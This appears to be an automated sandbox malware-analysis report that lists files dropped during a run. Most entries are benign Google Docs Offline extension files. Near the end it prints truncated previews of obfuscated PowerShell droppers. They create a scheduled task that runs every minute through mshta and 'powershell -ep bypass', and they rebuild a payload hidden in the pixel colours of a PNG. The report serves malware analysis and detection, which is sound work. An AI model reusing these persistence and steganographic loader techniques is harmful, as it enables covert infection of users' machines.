Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1492
Entropy (8bit):	5.672084606321544
Encrypted:	false
SSDEEP:	24:v7n9hbq9mXLq9m7JE1N9Fj5CNv6ixffOJPbP1xTLiD1GUmXWsz65ptWXWsz65pBm:vu1vFcq7xHiD1GNWsYaWs0WLWsRD3
MD5:	E76B502F0FD6AC32C3BF3B8C5581A136
SHA1:	20D74C28B1B42933114EAA01F1721EA4B5E1F5F7
SHA-256:	3C1481EDFE53129DDF450094478A12E3CBB5497A7ED5E4E356A81BAA36CABBD1
SHA-512:	DBC0515BBD247A94ED3AE3874C54DA715CF7B6365F5751B8E478F18BF11830CB1E61B2AC6A013DFFF9D774C61338A8B876D0DAEF35BEC63A22D9A8BC5495F944
Malicious:	false
Preview:	..$rPBXwprKBKrYFqJylXaL = $MyInvocation.MyCommand.Name -replace ".ps1",""..$UpXvdYtdCfWWjbbzpAif = $PSCommandPath -replace "1.ps1","2.ps1" ..$UpXvdYtdCfWWjbbzpAif2 = $PSCommandPath -replace "1.ps1","1.txt"....try{.. $FNgczKVKpfznjbocCbKK = Get-ScheduledTask \| Where-Object {$_.TaskName -like $rPBXwprKBKrYFqJylXaL }.. $ZZNeNQvOUycBigjvGhBg = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1).. $IqlWazkCnzcjwGVSrRmD = New-ScheduledTaskAction -Execute "mshta" -Argument "vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"powershell -ep bypass -File """"""""$UpXvdYtdCfWWjbbzpAif """""""""""" ,0:close"")".. $jKHPdRnOfRNRAvSshcTD = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");..if(!$FNgczKVKpfznjbocCbKK) {.. if($jKHPdRnOfRNRAvSshcTD -eq 'True'){.. Register-ScheduledTask -TaskName $rPBXwprKBKrYFqJylXaL -Trigger $ZZNeNQvOUycBigjvGhBg -Action $IqlWazkCnzcjwGVSrRmD -RunLevel Highest.. }e

C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	634
Entropy (8bit):	5.785990167479314
Encrypted:	false
SSDEEP:	12:Q205n9CZUssnTdLU6c/oLdH020iZUY+NZUY7iSn9Q4GXL3p7SzlSOTc:Q205n9CYnTJ3kWdU20ipiTXn9Zwp6I
MD5:	A1DF2BDFA37C5B2B65EEAAED61EC47A6
SHA1:	88E0DB1B750BED1E19BC424840A77C8298D2BBF0
SHA-256:	78077AB3D209B0DF4A6FBE1194AB581EF596E40EE56D753F26C97E5507769FC5
SHA-512:	C955F7547B4D52196BCE85267B3684D698C14B307BECA1D201D642AF6FECE252D469AAD846B02595BFF0037E28A0C906277DC874C4F5A0698F8A92B9DC2F5F9C
Malicious:	true
Preview:	$ZtaxTpSJVCVTwIoVAbHx = $MyInvocation.MyCommand.Name -replace ".ps1",""..$vfmZNQEeBLvBMRUqldPI = $false..$ESiYefJzgPliIrHUYsrR = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$ZtaxTpSJVCVTwIoVAbHx", ([ref] $vfmZNQEeBLvBMRUqldPI)..if( -not $vfmZNQEeBLvBMRUqldPI ) {.. Exit..} else{..$YTcwqXuRmMJXXeSMXhCb = $PSScriptRoot..$NdPOpsbaLfHJBKgPubuT = $MyInvocation.MyCommand.Name -replace "2.ps1","3.ps1"..$BOucvbBWopKKlEqRULnz = $YTcwqXuRmMJXXeSMXhCb + "\"+$NdPOpsbaLfHJBKgPubuT..$gRFbQvIcihtOtOvfLcpC = & $BOucvbBWopKKlEqRULnz..$gRFbQvIcihtOtOvfLcpC.EntryPoint.Invoke($null, $null)..}

C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4176
Entropy (8bit):	5.801086973386368
Encrypted:	false
SSDEEP:	48:DQhkXHcF0H0V2ZnYyX5O0zvfhHvog0QBk1uokukPs0dCU1NEGSIjERvkRuUem4WF:DQhkXHY0UUZnYSbvZMQBkQLeIYwuIIc
MD5:	E60BD2FE178634691C0C47992DF1E947
SHA1:	B584BCD3AFB725D338CB04872C71CB44D9929150
SHA-256:	EF6825A6F1206022E3D83B61BAB2A159769400CA1A62AF64B91AE32C3B048D56
SHA-512:	5A7F55E05F251F1223602350D4ADCC78CF8741182B3C512BF66AEF3116C066FE3D456557B98360463F5901963B1EE06BEECC4628D74F74B4932F02520203F10B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1, Author: Joe Security
Preview:	Add-Type -AssemblyName System.Drawing..Add-Type -AssemblyName System....Function TxCiMKMrnHSCPXbfrcFS {..[CmdletBinding()].. param(.. [Parameter(Mandatory=$true)] [String]$GHF,.. [Parameter(Mandatory=$true)] [String]$bts.. )....$gePZQGFMhrAbTMjmDDqu = [System.Drawing.Bitmap]::FromFile((Resolve-Path $GHF).ProviderPath)..$psMGjPHCHqBMWfZacWLr = ""..$xIEUSvmwKkSLBXBaSlnm = [System.Text.StringBuilder]::new()..for ($LCDDufPurWlYYOycHWRo = 0; $LCDDufPurWlYYOycHWRo -le $gePZQGFMhrAbTMjmDDqu.Height-1; $LCDDufPurWlYYOycHWRo++){.. for ($hvvHxDlRAXAbMvNQnCUF = 0; $hvvHxDlRAXAbMvNQnCUF -le $gePZQGFMhrAbTMjmDDqu.Width-1; $hvvHxDlRAXAbMvNQnCUF++){.. $CZRnzDxAWWAzDUpbIBnt = $gePZQGFMhrAbTMjmDDqu.GetPixel($hvvHxDlRAXAbMvNQnCUF,$LCDDufPurWlYYOycHWRo).. $ViJqQFTyfmEucqCUXhmX = [System.Drawing.ColorTranslator]::ToHtml($CZRnzDxAWWAzDUpbIBnt).. $ViJqQFTyfmEucqCUXhmX = $ViJqQFTyfmEucqCUXhmX.replace("#000000","").. [void]$xIEUSvmwKkSLBXBaSlnm.Append($ViJqQFTyfmEucqCUXhmX.replace("#",

C:\Users\user\AppData\Roaming\Adobe\vMcvSUhjRwUjZHoUBOuO.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1472 x 1472, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7423137
Entropy (8bit):	7.986160893619145
Encrypted:	false
SSDEEP:	196608:pOWvepvrfW5v0uvYc8qoGRahTNiTNg0OxShfH:dvWD+RYc8qofh2vOxU/
MD5:	286A785275BF85F8A4B30C5A1098639B
SHA1:	44B978051EC43ED3C9E3F7B529356511C6DBBED8
SHA-256:	292BA5185F91CC3554EDB1FA60E16C4E4FAF88FC4BFC8FFACA46E7E58133DF90
SHA-512:	D4D5B449715BD28681F4125F4FB50D45AB823FAE9B226F14E622196201964A5DFF5D40ECC4EEAD6C3E3404EFC2ADB41DFA0719B0EDECCD19E7972C16059872A8
Malicious:	false
Preview:	.PNG........IHDR.............q.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..gX....S)QTZV.!.HR...JS....4....@Vd.(%{..4....B.eDQ.!2........x.}...z...AB.......I,...Q....39_.r.0.~..#=.+./.S.9.]...Z..TIet.=..r".29.#.?.Q.- wA."..Q.m.N.E,j..5d.{n$..B........u...fW.V."...1O..cD.0$..g........b..;..4..6a.$oa......g.w..(.hw.u...^..m...]....(.K..j.pQ0M...w..Y=.p8.4..L...M..=.#...d..2..^eQ.en.w..m..j..1...C...\|y!....O......4o).nS...-.xw...I....-m..q.Y.u^..If.3r.......?t.1B......x...W9k...-......+'N... ...%..9..%....1A)3..%Z...Ej.M..vC...f2.{.b....z.g...%k~..by9..{,..'..}.?P2..". &%..O..Vo......Q..!..w...<.].....v/..7.0Y.(.M.H...Yr..A.....x.\.m....ge......l...l....0...Fsm.?...j.(..#..[.4...,..t.en.....<......\.;.....O.M....r5..?....9.Y@R..2...:..u.....r`M...Y.-..v.FM...<.?...{Q.....fU.&.8.".b.....'gT..8#..U..?............>..Y..XI..+bs%....i>.,.G.t1..jp_i.}_.O....K....L.h..z.E..1.`...=]......./..Me....s.....?.g.F}..\|9!2..y.:...eLK..^.w...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 22:06:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9789858983278754
Encrypted:	false
SSDEEP:	48:8fd7TjvvHtidAKZdA19ehwiZUklqehhy+3:85nniy
